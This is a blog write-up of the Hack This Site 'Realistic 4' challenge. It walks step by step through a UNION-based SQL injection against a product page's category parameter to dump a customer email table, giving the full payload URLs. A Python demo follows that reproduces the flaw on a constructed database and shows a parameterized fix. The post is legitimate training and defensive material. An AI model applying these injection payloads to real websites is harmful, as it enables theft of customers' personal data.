What is it? @.@

Here is the place where I record some tactics about wargames, systems, and other security issues.

2012-09-18

Hack This Site! - Realistic 4

Description:

Fischer's Animal Products
FAP is a company that slaughters animals and turns their skin into overpriced products which are then sold to rich bastards! Help animal rights activists increase political awareness by hacking their mailing list. 

Realistic 4:
From: SaveTheWhales 

Message: Hello, I was referred to you by a friend who says you know how to hack into computers and web sites - well I was wondering if you could help me out here. There's this local store who is killing hundreds of animals a day exclusively for the purpose of selling jackets and purses etc out of their skin! I have been to their website and they have an email list for their customers. I was wondering if you could somehow hack in and send me every email address on that list? I want to send them a message letting them know of the murder they are wearing. Just reply to this message with a list of the email addresses. Please? Their website is at http://www.hackthissite.org/missions/realistic/4/. Thanks so much!!

Solution:
  1. Of course, viewing the page source is the basic first step. At the same time, you should also take a tour of the whole website.
  2. Obviously, there's an HTML input form smiling at you on the front page. Let's try it! Just enter something abnormal, which means anything that is NOT a valid email format.
  3. You will get an error message displayed on the page.
    Error inserting into table "email"! Email not valid! Please contact an administrator of Fischer's
  4. Okay~ now we know there's a table named 'email' in the database, and that's our goal. We need to steal the data stored in the 'email' table.
  5. After countless attempts against the input form, you'll find nothing except the error message above. So we shift our target to the product page.
  6. Visit the product pages and you'll notice that the URL contains a magic id.
    Fur Coats!
    hxxp://www.hackthissite.org/missions/realistic/4/products.php?category=1
    Alligator Accessories!
    hxxp://www.hackthissite.org/missions/realistic/4/products.php?category=2
  7. If we append a single quote to the end of the URL, we get an empty page, but it is not really empty: view the page source and you'll see that the HTML template code is still there.
  8. Now we have another hint: maybe there is a SQL injection vulnerability.
  9. We want to use the SQL injection in the product page to fetch the email addresses from the 'email' table, so we need a UNION ALL statement.
    Here is the reference and guide:
    http://hakipedia.com/index.php/SQL_Injection#UNION_Statements
  10. You can append the following statement to the end of the URL, where %20 is the URL-encoded SPACE character.
    %20UNION%20ALL%20SELECT%20NULL%20FROM%20email;

    Your URL will look like this:
    hxxp://www.hackthissite.org/missions/realistic/4/products.php?category=1%20UNION%20ALL%20SELECT%20NULL%20FROM%20email;
  11. Visiting this URL gives you an empty page again, because the number of columns selected from the 'email' table does not match the number selected from (probably) the 'products' table. You need to increase the number of NULL values in the statement.
  12. Finally, when you append the following statement to the end of the URL, you will get a fully displayed product page. Now you know the product page selects four columns from the database.
    %20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL,%20NULL%20FROM%20email;
  13. So, change one of the NULL values to an asterisk and you'll get their customers' email list.
    Visit: hxxp://www.hackthissite.org/missions/realistic/4/products.php?category=1%20UNION%20ALL%20SELECT%20NULL,%20*,%20NULL,%20NULL%20FROM%20email;
  14. Go back to the description page, click your name and send the message to "SaveTheWhales".
  15. Congratulations, you have successfully completed realistic 4!
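The bug behind steps 6 to 13, as an added example that is not part of the challenge or this post: a constructed SQLite schema with the four-column product query the NULL probes imply, the string-concatenated lookup that lets the UNION through, and a hardened version that validates the parameter as an integer and binds it. The table names, columns and sample rows are all assumptions made for the demo.

```python
import re
import sqlite3

# Constructed sample schema (not the real site's): "products" has four columns,
# matching the count the NULL probes in steps 10-12 discover, and the mailing
# list lives in a table named "email", as the leaked error message revealed.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER, category INTEGER, name TEXT, price TEXT);
        INSERT INTO products VALUES (1, 1, 'Fur Coat', '$999'), (2, 2, 'Gator Belt', '$199');
        CREATE TABLE email (email TEXT);
        INSERT INTO email VALUES ('customer1@example.com'), ('customer2@example.com');
    """)
    return con

def products_vulnerable(con, category):
    """Pattern implied by the walkthrough: the raw request parameter is glued
    into the SQL text, so everything after the number is parsed as SQL."""
    sql = "SELECT id, category, name, price FROM products WHERE category=" + category
    return con.execute(sql).fetchall()

def products_safe(con, category):
    """Hardened version: allow only a plain integer and bind it as a parameter.
    The rejection message is generic; it names no table (step 3's error did)."""
    if not re.fullmatch(r"[0-9]{1,9}", category):
        raise ValueError("invalid request")
    sql = "SELECT id, category, name, price FROM products WHERE category=?"
    return con.execute(sql, (int(category),)).fetchall()

# The injected value the walkthrough appends to ?category= (URL-decoded), with
# the asterisk spelled out as the single column of the constructed email table.
PAYLOAD = "1 UNION ALL SELECT NULL, email, NULL, NULL FROM email"

def leaked_emails(rows):
    """Collect mailing-list addresses that came back in the second column of
    rows the UNION appended (those rows have no product id)."""
    return sorted(r[1] for r in rows if r[0] is None)

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", leaked_emails(products_vulnerable(con, PAYLOAD)))
    try:
        products_safe(con, PAYLOAD)
    except ValueError as exc:
        print("safe:", exc)
```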